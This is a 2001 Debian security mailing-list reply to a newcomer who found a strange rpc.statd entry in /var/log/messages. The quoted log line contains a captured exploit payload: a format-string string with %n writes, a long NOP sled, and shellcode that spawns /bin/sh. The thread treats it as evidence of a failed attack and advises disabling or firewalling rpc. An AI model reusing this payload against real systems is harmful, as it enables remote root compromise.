[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: strange log entry

Definitely a security problem.  But the fact that you actually saw
something is good news .. it means the exploit didn't work.  If it had
worked, the thing would just die quietly and not log anything.  Better off
without rpc anyway, unless you *need* it for NFS or something
similar.  And if you really need it, make sure it's firewalled.

I get about 30 similar rpc.statd scans every day on most of my
machines.  Glad they're not running rpc.statd :)

--Henry


On Thu, 24 May 2001 trev26@ihug.com.au wrote:

> Heya :)
>  
> I was running a 'tail -f' on my /var/log/messages and this entry appeared while
> I was connected to the internet:
> 
> May 24 10:08:11 noogies -- MARK --
> May 24 10:20:34 noogies
> May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for
> ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> May 24 10:20:34 noogies
> Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ
> 
> and it has me worried it may be a security issue. I'm very new to linux, and
> newer again to debian, and at this stage I really don't have a clue as to what
> the above log entry is trying to tell me...
> 
> Any input or comments would be very appreciated :)
> 
> Thank you
> 
> - trevs
> 
> 
> 
> --  
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
>
Reply to: